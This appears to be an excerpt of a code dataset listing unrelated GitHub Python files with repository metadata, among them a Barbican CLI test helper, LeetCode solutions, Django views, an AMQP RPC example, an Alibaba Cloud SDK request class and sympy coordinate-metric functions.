:param payload_content_type the payload content type.
"""
argv = ['secret', 'update']
self.add_auth_and_endpoint(argv)
argv.extend([secret_href])
argv.extend([payload])
stdout, stderr = self.issue_barbican_command(argv)
def delete_secret(self, secret_href):
"""Delete a secret
:param secret_href the href to the secret to delete
"""
argv = ['secret', 'delete']
self.add_auth_and_endpoint(argv)
argv.extend([secret_href])
stdout, stderr = self.issue_barbican_command(argv)
self.secret_hrefs_to_delete.remove(secret_href)
def store_secret(self, payload="Payload for testing", store_argv=[]):
"""Store (aka create) a secret
The store_argv parameter allows additional command line parameters for
the store operation to be specified. This can be used to specify -a for
algorithm as an example.
:param payload The payload to use when storing the secret
:param store_argv The store command line parameters
:return: the href to the newly created secret
"""
argv = ['secret', 'store']
self.add_auth_and_endpoint(argv)
argv.extend(['--payload', payload])
argv.extend(store_argv)
stdout, stderr = self.issue_barbican_command(argv)
secret_data = self._prettytable_to_dict(stdout)
secret_href = secret_data['Secret href']
self.secret_hrefs_to_delete.append(secret_href)
return secret_href
def get_secret(self, secret_href):
"""Get a secret
:param: the href to a secret
:return dict of secret values, or an empty dict if the secret
is not found.
"""
argv = ['secret', 'get']
self.add_auth_and_endpoint(argv)
argv.extend([secret_href])
stdout, stderr = self.issue_barbican_command(argv)
if '4xx Client error: Not Found' in stderr:
return {}
secret_data = self._prettytable_to_dict(stdout)
return secret_data
def get_secret_payload(self, secret_href, raw=False):
"""Get a secret
:param: the href to a secret
:param raw if True then add "-f value" to get raw payload (ie not
within a PrettyTable). If False then omit -f.
:return string representing the secret payload.
"""
argv = ['secret', 'get']
self.add_auth_and_endpoint(argv)
argv.extend([secret_href])
argv.extend(['--payload'])
if raw:
argv.extend(['-f', 'value'])
stdout, stderr = self.issue_barbican_command(argv)
if '4xx Client error: Not Found' in stderr:
return {}
if raw:
secret = stdout.rstrip()
else:
secret_data = self._prettytable_to_dict(stdout)
secret = secret_data['Payload']
return secret
def list_secrets(self):
"""List secrets
:return: a list of secrets
"""
argv = ['secret', 'list']
self.add_auth_and_endpoint(argv)
stdout, stderr = self.issue_barbican_command(argv)
secret_list = self._prettytable_to_list(stdout)
return secret_list
def delete_all_created_secrets(self):
"""Delete all secrets that we created"""
for href in self.secret_hrefs_to_delete:
self.delete_secret(href)
|
[
"gongwayne@hotmail.com"
] |
gongwayne@hotmail.com
|
63e3cad549c027b04f4f2aeabb6948e59f1936fe
|
15de7f67ac019324d99076906e7864e2b3d52218
|
/Part 3/Ch1.py
|
c6c9fd87d0c1035be6d4c4b6f26a3055489bf39b
|
[] |
no_license
|
ankiwoong/Web_Scraping_in_Python
|
df97aebc36b43d125f5d4ff55ab47cd114656c51
|
dcc0950ee7fb5e4b9acaec581a2fcd590d27bb4a
|
refs/heads/master
| 2022-12-03T07:58:38.626717
| 2020-08-30T02:37:13
| 2020-08-30T02:37:13
| 289,597,273
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 588
|
py
|
import mechanicalsoup
browser = mechanicalsoup.Browser()
# browser() 객체는 head가 없는 웹 브라우저를 나타낸다.
# URL을 .get() 메소드에 전달하여 인터넷에서 페이지를 요청할 수 있다.
url = "http://olympus.realpython.org/login"
page = browser.get(url)
# 출력
print(page)
# MechanicalSoup은 요청에서 HTML을 구문 분석하기 위해 Beautiful Soup을 사용한다.
# 페이지에는 BeautifulSoup 개체를 나타내는 .soup 속성이 있다
print(type(page.soup))
# .soup 속성을 검사하여 HTML을 볼 수 있다.
print(page.soup)
|
[
"ankiwoong@gmail.com"
] |
ankiwoong@gmail.com
|
0cce371b26cc503d2072a6754493cd4e3c5ce7cb
|
4749d3cf395522d90cb74d1842087d2f5671fa87
|
/alice/LC686.py
|
67bed14402b09716dbc8ef161fcd6f9c04fb99e2
|
[] |
no_license
|
AliceTTXu/LeetCode
|
c1ad763c3fa229362350ce3227498dfb1f022ab0
|
ed15eb27936b39980d4cb5fb61cd937ec7ddcb6a
|
refs/heads/master
| 2021-01-23T11:49:49.903285
| 2018-08-03T06:00:16
| 2018-08-03T06:00:16
| 33,470,003
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 625
|
py
|
class Solution(object):
def repeatedStringMatch(self, A, B):
"""
:type A: str
:type B: str
:rtype: int
"""
temp_out = len(B) / len(A)
end = self.find_substring_ending(A * (temp_out + 2), B)
if end == -1:
return -1
else:
return temp_out + ((end + 1) - len(A) * temp_out) / len(A) + (((end + 1) - len(A) * temp_out) % len(A) > 0)
def find_substring_ending(self, A, B):
for i in xrange(len(A) - len(B) + 1):
if A[i:i + len(B)] == B:
return i + len(B) - 1
return -1
|
[
"aliceadelice@gmail.com"
] |
aliceadelice@gmail.com
|
3bcdcd1ec3d8551f1937844d1b5049ba7f40e0de
|
21bbcc4898cc653d2a81b91f500293f7e6932fc8
|
/users/views/bet.py
|
44bac74410fd01c5813a9e733895dec785afbeca
|
[] |
no_license
|
ewgen19892/auction
|
7e116354008349bbde147b42ee1a909cac7fc00b
|
1449156a4985ca7757e342613e0762e11ed9aa30
|
refs/heads/master
| 2023-05-31T23:02:14.539923
| 2021-06-30T13:21:13
| 2021-06-30T13:21:13
| 381,708,643
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,256
|
py
|
"""Bets views."""
from rest_framework.generics import GenericAPIView
from rest_framework.mixins import (
CreateModelMixin,
ListModelMixin,
RetrieveModelMixin,
)
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from users.models.bet import Bet
from users.serializers.bet import BetSerializer
class BetList(GenericAPIView, ListModelMixin, CreateModelMixin):
"""Bet list view."""
queryset = Bet.objects.all()
serializer_class = BetSerializer
permission_classes = (IsAuthenticated,)
def get(self, request, *args, **kwargs) -> Response:
"""
Get Bets list.
"""
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs) -> Response:
"""
Create a new bet.
"""
return self.create(request, *args, **kwargs)
class BetDetail(
GenericAPIView,
RetrieveModelMixin,
):
"""Bet detail view."""
serializer_class = BetSerializer
queryset = Bet.objects.all()
permission_classes = (IsAuthenticated,)
def get(self, request, *args, **kwargs) -> Response:
"""
Get bet by ID.
"""
return self.retrieve(request, *args, **kwargs)
|
[
"e.bohovchuk@admitad.com"
] |
e.bohovchuk@admitad.com
|
5b3f7af6254318f0492a9a4656e243ea1a650008
|
18f776553a59a89faf05144ed1a69dc563dc4e9e
|
/Algorithm/insert_sort.py
|
cbdb6501102014039571662e8f5b9136479ee6a9
|
[] |
no_license
|
g-lyc/LeetCode
|
274feff3b6c61da0ec8726deac0b298baed5cf10
|
fa45cd44c3d4e7b0205833efcdc708d1638cbbe4
|
refs/heads/master
| 2022-12-13T14:50:02.976951
| 2020-09-03T09:39:58
| 2020-09-03T09:39:58
| 259,212,315
| 15
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 706
|
py
|
# coding:utf-8
def insert_sort(alist):
"""插入排序"""
n = len(alist)
# 从右边的无序序列中取出多少个元素执行这样的过程
for j in range(1, n):
# j = [1, 2, 3, n-1]
# i 代表内层循环起始值
i = j
# 执行从右边的无序序列中取出第一个元素,即i位置的元素,然后将其插入到前面的正确位置中
while i > 0:
if alist[i] < alist[i-1]:
alist[i], alist[i-1] = alist[i-1], alist[i]
i -= 1
else:
break
if __name__ == "__main__":
li = [54, 26, 93, 17, 77, 31, 44, 55, 20]
print(li)
insert_sort(li)
print(li)
|
[
"309080979@qq.com"
] |
309080979@qq.com
|
6aca02bb5efcef065a9dbd7d46d07f6bb6937bf1
|
76e8afe527e191e6291562c6140606c16d7385df
|
/wsgi.py
|
75ad6b25013956a7af77660d24fbd9058b5cb79c
|
[] |
no_license
|
socek/tklive2013
|
dfa896800713832d3f1b4a11f35aecf723e09328
|
2fa8c6fd099a66b7f84fc5df94d0a2b542a44f75
|
refs/heads/master
| 2021-01-22T05:16:34.001073
| 2013-02-25T13:14:43
| 2013-02-25T13:14:43
| 42,201,372
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 345
|
py
|
#!/home/socek/www/2013.turniejkosza.pl/venv/bin/python
import os, sys
sys.path.append('/home/socek/www/2013.turniejkosza.pl/tklive')
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings' # this is your settings.py file
os.environ['PYTHON_EGG_CACHE'] = '/tmp'
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
|
[
"msocek@gmail.com"
] |
msocek@gmail.com
|
253c9632016a2b5d45b61ace6d16cc791687be0b
|
20f2f9c4728cc8380062c557b838af45d65b909b
|
/tests/basetypes.py
|
ad5a3e8fe487b3e4dd897fef64492948ff945397
|
[] |
no_license
|
dankamongmen/everpad
|
5cea529cab55f2c4a8f4fc5588807c35b2a61aef
|
4eea1d6c9b322cbad021453f3a0dc57582fb5c6a
|
refs/heads/master
| 2021-01-16T19:51:27.598790
| 2012-12-06T09:28:28
| 2012-12-06T09:37:13
| 7,032,105
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,317
|
py
|
import sys
sys.path.append('..')
from everpad.basetypes import Tag, DbusSendable
import unittest
class TestBaseTypes(unittest.TestCase):
def test_signature(self):
class Fake(DbusSendable):
fields = (
('id', 'i'),
('name', 's'),
)
self.assertEqual(
Fake.signature, '(is)',
'generate signature',
)
def test_serialise(self):
class Fake(object):
id = 0
name = '123'
tag = Tag.from_obj(Fake())
self.assertEqual(
tag.struct, (0, '123'),
'serialise to struct',
)
def test_load(self):
tag = Tag.from_tuple((0, '123'))
self.assertEqual(
tag.name, '123',
'load from struct',
)
def test_give(self):
class Fake(object):
id = 0
@property
def id_dbus(self):
return self.id
@id_dbus.setter
def id_dbus(self, val):
self.id = val + 12
tag = Tag.from_tuple((0, '123'))
obj = Fake()
tag.give_to_obj(obj)
self.assertEqual(
obj.id, 12,
'give data to object',
)
if __name__ == '__main__':
unittest.main()
|
[
"nvbn.rm@gmail.com"
] |
nvbn.rm@gmail.com
|
e2001593d3dace8fffbd229e25b81b7d1a5932c2
|
e54c04a919a21af0564c6d3f77c92c84a097e58b
|
/src/front-door/azext_front_door/vendored_sdks/models/frontend_endpoint_link_py3.py
|
2777bd8e09b27cfb2d1604822a29b8ac26415ee0
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
rlrossiter/azure-cli-extensions
|
b8b4acad5394edbff545f4fd145cf24255db7453
|
e8a640e6623e69e21fa7118eceb1ae28d134bb9a
|
refs/heads/master
| 2021-08-06T18:17:29.141297
| 2019-09-22T13:37:04
| 2019-09-22T13:37:04
| 210,704,389
| 1
| 0
|
MIT
| 2019-09-24T21:56:44
| 2019-09-24T21:56:43
| null |
UTF-8
|
Python
| false
| false
| 905
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class FrontendEndpointLink(Model):
"""Defines the Resource ID for a Frontend Endpoint.
:param id: Resource ID.
:type id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(self, *, id: str=None, **kwargs) -> None:
super(FrontendEndpointLink, self).__init__(**kwargs)
self.id = id
|
[
"tjprescott@users.noreply.github.com"
] |
tjprescott@users.noreply.github.com
|
e165f515f5a8171ea465a2a3904e19bda27ebe4a
|
ad2090cc9591d38456621951d4901276481b55fd
|
/python编程技巧提高/day03/ex3_实现反向迭代.py
|
389dd1920cf2aee18456d949fadf7f3918a3afae
|
[] |
no_license
|
GuangGuangLi-Artist/LearningPython
|
9d17366c4b64f5b3d53b885b71f1cf9bd4d2f53f
|
0810ff6d0cc557f4d5ed8c024ce413a93183a6da
|
refs/heads/master
| 2023-08-18T16:32:03.595418
| 2023-07-30T09:47:48
| 2023-07-30T09:47:48
| 201,511,027
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 614
|
py
|
#coding=utf-8
class FloatRange():
def __init__(self,start,end,step=0.1):
self.start = start
self.end = end
self.step = step
def __iter__(self):
t = self.start
while t <= self.end:
yield t
t += self.step
def __reversed__(self):
t = self.end
while t >= self.start:
yield t
t -= self.step
if __name__ == '__main__':
'''正向迭代'''
# for x in FloatRange(1.0,4.0,0.5):
# print(x)
'''反向迭代'''
for x in reversed(FloatRange(1.0, 4.0, 0.5)):
print(x)
|
[
"15607521232@163.com"
] |
15607521232@163.com
|
6033d53dbc557f177f5618eb13bead953214860f
|
39d4504ec1da8975fac526d6801b94f4348b6b61
|
/official/utils/logs/hooks_helper_test.py
|
5adb5fdc343ad00cfab2557436de927e68501743
|
[
"Apache-2.0"
] |
permissive
|
vincentcheny/models
|
fe0ff5888e6ee00a0d4fa5ee14154acdbeebe7ad
|
afb1a59fc1bc792ac72d1a3e22e2469020529788
|
refs/heads/master
| 2020-07-23T21:38:24.559521
| 2019-11-15T07:50:11
| 2019-11-15T07:50:11
| 207,712,649
| 1
| 0
|
Apache-2.0
| 2019-09-11T03:12:31
| 2019-09-11T03:12:31
| null |
UTF-8
|
Python
| false
| false
| 2,777
|
py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for hooks_helper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
import tensorflow as tf # pylint: disable=g-bad-import-order
from official.utils.logs import hooks_helper
from official.utils.misc import keras_utils
class BaseTest(unittest.TestCase):
def setUp(self):
super(BaseTest, self).setUp()
if keras_utils.is_v2_0:
tf.compat.v1.disable_eager_execution()
def test_raise_in_non_list_names(self):
with self.assertRaises(ValueError):
hooks_helper.get_train_hooks(
'LoggingTensorHook, ProfilerHook', model_dir="", batch_size=256)
def test_raise_in_invalid_names(self):
invalid_names = ['StepCounterHook', 'StopAtStepHook']
with self.assertRaises(ValueError):
hooks_helper.get_train_hooks(invalid_names, model_dir="", batch_size=256)
def validate_train_hook_name(self,
test_hook_name,
expected_hook_name,
**kwargs):
returned_hook = hooks_helper.get_train_hooks(
[test_hook_name], model_dir="", **kwargs)
self.assertEqual(len(returned_hook), 1)
self.assertIsInstance(returned_hook[0], tf.estimator.SessionRunHook)
self.assertEqual(returned_hook[0].__class__.__name__.lower(),
expected_hook_name)
def test_get_train_hooks_logging_tensor_hook(self):
self.validate_train_hook_name('LoggingTensorHook', 'loggingtensorhook')
def test_get_train_hooks_profiler_hook(self):
self.validate_train_hook_name('ProfilerHook', 'profilerhook')
def test_get_train_hooks_examples_per_second_hook(self):
self.validate_train_hook_name('ExamplesPerSecondHook',
'examplespersecondhook')
def test_get_logging_metric_hook(self):
test_hook_name = 'LoggingMetricHook'
self.validate_train_hook_name(test_hook_name, 'loggingmetrichook')
if __name__ == '__main__':
tf.test.main()
|
[
"1155107977@link.cuhk.edu.hk"
] |
1155107977@link.cuhk.edu.hk
|
ad0e22e38a0cabad285892fabed6f049c4e102a0
|
ba9fc166ea9adb64e522471a4fc96e1810862516
|
/examples/simple_rpc_server.py
|
db4cdd58130f340bb9dc83a573bde92b1e461b2d
|
[
"MIT"
] |
permissive
|
martincolladodotcom/amqpstorm
|
30ca347234f86b653ea6c0327ba93b7d40b8dee6
|
8c320601b92482472f3e5fe366221fa276c49004
|
refs/heads/master
| 2021-08-07T13:52:53.570087
| 2017-11-08T07:54:59
| 2017-11-08T07:54:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,021
|
py
|
"""
RPC Server example based on code from the official RabbitMQ Tutorial.
http://www.rabbitmq.com/tutorials/tutorial-six-python.html
"""
import amqpstorm
from amqpstorm import Message
CONNECTION = amqpstorm.Connection('127.0.0.1', 'guest', 'guest')
CHANNEL = CONNECTION.channel()
CHANNEL.queue.declare(queue='rpc_queue')
def fib(number):
if number == 0:
return 0
elif number == 1:
return 1
else:
return fib(number - 1) + fib(number - 2)
def on_request(message):
number = int(message.body)
print(" [.] fib(%s)" % (number,))
response = str(fib(number))
properties = {
'correlation_id': message.correlation_id
}
response = Message.create(message.channel, response, properties)
response.publish(message.reply_to)
message.ack()
if __name__ == '__main__':
CHANNEL.basic.qos(prefetch_count=1)
CHANNEL.basic.consume(on_request, queue='rpc_queue')
print(" [x] Awaiting RPC requests")
CHANNEL.start_consuming(to_tuple=False)
|
[
"me@eandersson.net"
] |
me@eandersson.net
|
9af698eb1b9e10126a05c34812ef09e3ca26db5f
|
c4079336265fcaa2eb8be72d5a755d2dd3c95b1c
|
/bin/service.py
|
114b11a3ee9f2e3e925d41730aab7de2ddb60201
|
[
"MIT"
] |
permissive
|
alexhsamuel/absence
|
3bdd5e9b6f20f995b4b71ffc6ad94c52c7757c59
|
2dcb1e14f4ec0d90b1dad3ca03ebba7fa5a3d3ff
|
refs/heads/master
| 2020-03-11T06:39:26.328341
| 2018-04-17T03:37:55
| 2018-04-17T03:37:55
| 129,835,861
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,848
|
py
|
#!/usr/bin/env python
import argparse
import flask
import logging
from pathlib import Path
import absence.api
import absence.api.service
from absence.db import SqliteDB
#-------------------------------------------------------------------------------
app = flask.Flask(__name__)
app.register_blueprint(absence.api.service.API, url_prefix="/api/v1")
logging.basicConfig(
format ="%(asctime)s [%(levelname)-7s] %(name)s: %(message)s",
datefmt ="%Y-%m-%dT%H:%M:%S",
)
parser = argparse.ArgumentParser()
parser.add_argument(
"--host", metavar="ADDR", default="localhost",
help="serve on ADDR [def: localhost]")
parser.add_argument(
"--port", metavar="PORT", type=int, default=absence.api.DEFAULT_PORT,
help="serve on PORT [def: {}]".format(absence.api.DEFAULT_PORT))
parser.add_argument(
"--repo", metavar="PATH", type=Path, default=Path("./repo"),
help="use repo dir at PATH")
parser.add_argument(
"--initialize", action="store_true", default=False,
help="initialize repo if missing")
parser.add_argument(
"--debug", action="store_true", default=False,
help="run Werkzeug in debug mode")
parser.add_argument(
"--log", metavar="LEVEL", default="INFO",
help="log at LEVEL [def: INFO]")
parser.add_argument(
"--db", metavar="FILE", default="./absence.sqlite",
help="path to database")
parser.add_argument(
"--create-db", action="store_true", default=False,
help="create the database")
args = parser.parse_args()
logging.getLogger().setLevel(getattr(logging, args.log.upper()))
# We don't cache the database as SQLite connections are thead-specific.
# But either create or check it up front.
if args.create_db:
SqliteDB.create(args.db)
else:
SqliteDB.open(args.db)
app.db_path = args.db
app.run(host=args.host, port=args.port, debug=args.debug, threaded=False)
|
[
"alex@alexsamuel.net"
] |
alex@alexsamuel.net
|
9851e0e373c9fa6897b1f6abde21d140a495945e
|
b7620d0f1a90390224c8ab71774b9c906ab3e8e9
|
/aliyun-python-sdk-gpdb/aliyunsdkgpdb/request/v20160503/DescribeSQLLogsOnSliceRequest.py
|
6c001777dbc8db958ef3c54d9c3f181732da9bde
|
[
"Apache-2.0"
] |
permissive
|
YaoYinYing/aliyun-openapi-python-sdk
|
e9c62940baee1a35b9ec4a9fbd1e4eb0aaf93b2f
|
e9a93cc94bd8290d1b1a391a9cb0fad2e6c64627
|
refs/heads/master
| 2022-10-17T16:39:04.515562
| 2022-10-10T15:18:34
| 2022-10-10T15:18:34
| 117,057,304
| 0
| 0
| null | 2018-01-11T06:03:02
| 2018-01-11T06:03:01
| null |
UTF-8
|
Python
| false
| false
| 2,838
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkgpdb.endpoint import endpoint_data
class DescribeSQLLogsOnSliceRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'gpdb', '2016-05-03', 'DescribeSQLLogsOnSlice')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_SliceId(self): # String
return self.get_query_params().get('SliceId')
def set_SliceId(self, SliceId): # String
self.add_query_param('SliceId', SliceId)
def get_PageNumber(self): # Integer
return self.get_query_params().get('PageNumber')
def set_PageNumber(self, PageNumber): # Integer
self.add_query_param('PageNumber', PageNumber)
def get_MinExecuteCost(self): # String
return self.get_query_params().get('MinExecuteCost')
def set_MinExecuteCost(self, MinExecuteCost): # String
self.add_query_param('MinExecuteCost', MinExecuteCost)
def get_PageSize(self): # Integer
return self.get_query_params().get('PageSize')
def set_PageSize(self, PageSize): # Integer
self.add_query_param('PageSize', PageSize)
def get_DBInstanceId(self): # String
return self.get_query_params().get('DBInstanceId')
def set_DBInstanceId(self, DBInstanceId): # String
self.add_query_param('DBInstanceId', DBInstanceId)
def get_MaxExecuteCost(self): # String
return self.get_query_params().get('MaxExecuteCost')
def set_MaxExecuteCost(self, MaxExecuteCost): # String
self.add_query_param('MaxExecuteCost', MaxExecuteCost)
def get_ExecuteState(self): # String
return self.get_query_params().get('ExecuteState')
def set_ExecuteState(self, ExecuteState): # String
self.add_query_param('ExecuteState', ExecuteState)
def get_QueryId(self): # String
return self.get_query_params().get('QueryId')
def set_QueryId(self, QueryId): # String
self.add_query_param('QueryId', QueryId)
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
06c1b7128e4e03525c80978f40c0045334e11190
|
c5d68f58c9523257a8b41954553f5cff2cd5f487
|
/Secao_08_Lista_Ex_73e/ex_67.py
|
b48841401026d069e655abe6f4ea6e4a504e6079
|
[] |
no_license
|
SouzaCadu/guppe
|
04bfcde82d4404eb9ec795006c6931ba07dc72b6
|
1f8a672230c5c27712f522e1e34516591c012453
|
refs/heads/master
| 2023-03-13T01:32:51.019871
| 2021-02-25T17:02:59
| 2021-02-25T17:02:59
| 320,908,119
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,256
|
py
|
"""
faça uma rotina que receba como parâmetro um vetor de caracteres e
seu tamanho. a função deverá de ler uma string do teclado, caractere por caractere
usando a função getchat() até que o usuário digite enter ou o tamanho máximo do
vetor seja alcançado.
"""
def getchar():
"""
Função que retorna o caractere informado pelo usuário durante a execução da função
:return: Retorna o caractere informado pelo usuário durante a execução da função.
Caso o usuário digite mais de um caractere, será retornado um valor do tipo None
"""
caractere = input("Informe um caractere: ")
if len(caractere) <= 1:
return caractere
def rotina(args, tamanho):
"""
Função que recebe um vetor e realiza uma rotina preenchendo o vetor
através de um looping até chegar ao tamanho desejado pelo usuário
:param args: Recebe um vetor
:param tamanho: Recebe a quantidade de vezes que deve ser preenchida pelo usuário
:return: Retorna o vetor preenchido pelo usuário
"""
for _ in range(tamanho):
valor = getchar()
if valor != "":
args.append(valor)
else:
break
return args
vetor = []
tam = 8
print(f"{rotina(vetor, tam)}")
|
[
"cadu.souza81@gmail.com"
] |
cadu.souza81@gmail.com
|
f2d735b073eda95981eb74d263efe7b8b08b0939
|
181af10fcf40b824fe92d3b8f72fd15d6d1490c2
|
/Contests/101-200/week 178/1368. Minimum Cost to Make at Least One Valid Path in a Grid/Minimum Cost to Make at Least One Valid Path in a Grid.py
|
c0f974e882a945b86410b30ef80cb3fbd07b4071
|
[] |
no_license
|
wangyendt/LeetCode
|
402c59a0b7b7f5b3a672231ea5dad8056ade36af
|
4a3ba15284c45b2d8bf38306c8c8526ae174615c
|
refs/heads/master
| 2023-08-10T06:27:54.995152
| 2023-08-10T02:22:27
| 2023-08-10T02:22:27
| 176,651,399
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 824
|
py
|
#!/usr/bin/env python
# encoding: utf-8
"""
@author: Wayne
@contact: wangye.hope@gmail.com
@software: PyCharm
@file: Minimum Cost to Make at Least One Valid Path in a Grid
@time: 2020/3/5 14:47
"""
class Solution:
def minCost(self, A: list(list())):
n, m, inf, k = len(A), len(A[0]), 10 ** 9, 0
dp = [[inf] * m for i in range(n)]
dirt = [[0, 1], [0, -1], [1, 0], [-1, 0]]
bfs = []
def dfs(x, y):
if not (0 <= x < n and 0 <= y < m and dp[x][y] == inf): return
dp[x][y] = k
bfs.append([x, y])
dfs(x + dirt[A[x][y] - 1][0], y + dirt[A[x][y] - 1][1])
dfs(0, 0)
while bfs:
k += 1
bfs, bfs2 = [], bfs
[dfs(x + i, y + j) for x, y in bfs2 for i, j in dirt]
return dp[-1][-1]
|
[
"905317742@qq.com"
] |
905317742@qq.com
|
70cfde39fc00d4c6dbdb49f823c1d203e72aeaa0
|
d09ad52c0911a83a5e5a03850bb5371d22446226
|
/metrics.py
|
c0c926ae23018f66d249ffebc51658a841faf430
|
[] |
no_license
|
hzfmer/pyawp
|
88d0ea24b47aa02a8ef4a89e59335b636a5c205b
|
aff564d59c1f00ada2755ab239980fbfa0a8d9cb
|
refs/heads/main
| 2023-05-08T07:37:53.603933
| 2021-05-27T18:51:56
| 2021-05-27T18:51:56
| 371,476,689
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,102
|
py
|
import sympy as sp
def covariant_basis(x, r):
"""
Compute covariant basis vectors.
Arguments:
x : List of mappings of physical coordinates to parameter coordinates
r : List of parameter coordinates.
Returns:
a : Covariant basis (list of vectors). For example, `a[0]` gives the
first covariant basis vector.
"""
a1 = [sp.diff(xi,r[0]) for xi in x]
a2 = [sp.diff(xi,r[1]) for xi in x]
a3 = [sp.diff(xi,r[2]) for xi in x]
return a1, a2, a3
def jacobian_matrix(a1,a2,a3):
"""
Return the Jacobian matrix.
"""
J = sp.Matrix([a1,a2,a3])
return J
def contravariant_basis(J, a):
"""
Compute contravariant basis vectors
Arguments:
J : Determinant of Jacobian
a : Covariant basis (list of basis vectors)
Returns:
b : Contravariant basis (list of vectors). For example, `b[0]` gives the
first contravariant basis vector.
"""
return [a[1].cross(a[2])/J, a[2].cross(a[0])/J, a[0].cross(a[1])/J]
def metric_tensor(a):
"""
Compute the metric tensor. Whether it is covariant or contravariant metric
tensor depends which basis vectors are passed into this function.
Arguments:
a : Either the covariant or contravariant basis vectors.
Returns:
G : A symmetric and positive definite matrix `G[i,j]`.
"""
m = len(a)
G = sp.zeros(m,m)
for i in range(m):
for j in range(m):
G[i,j] = a[i].dot(a[j])
return G
def metrics(x, r, eval_J=0):
"""
Compute metric coefficients for a mapping given physical coordinates `x` and
parameter coordinates `r`.
To use, specify x = [x1, x2, x3] for each xi, as a
function of each ri, i.e., `x1 = f(r1,r2,r3)`, etc.
Example:
>> import sympy as sp
>> f = sp.Function('f')(r1,r2)
>> x1 = f
Returns:
a : Covariant basis vectors
b : Contravariant basis vectors
Jmat : Jacobian matrix
J : Determinant of Jacobian matrix
"""
a1, a2, a3 = covariant_basis(x, r)
Jmat = jacobian_matrix(a1,a2,a3)
J = Jmat.det()
a = [sp.Matrix(ai) for ai in [a1, a2, a3]]
if eval_J:
b = contravariant_basis(J, a)
else:
b = contravariant_basis(sp.symbols('J'), a)
Ga = metric_tensor(a)
Gb = metric_tensor(b)
return a, b, Ga, Gb, Jmat, J
def christoffel(a, b, r):
"""
Compute the Christoffel symbols:
\Gamma^k_{ij} = a^k \cdot \frac{\partial a_i}{\partial r^j}
Input arguments:
a : Covariant basis vectors
b : Contravariant basis vectors
r : Coordinates
Returns:
Gam : Christoffel symbols as an array of matrices. Symbol is defined as
`Gam[k][i,j]`.
Gamsym : `Gam
"""
m = len(a)
Gam = [0]*m
for k in range(m):
Gam[k] = sp.zeros(m)
for i in range(m):
for j in range(m):
Gam[k][i,j] = b[k].dot([sp.diff(a[i][l], r[j]) \
for l in range(m)])
return Gam
|
[
"hzfmer94@gmail.com"
] |
hzfmer94@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.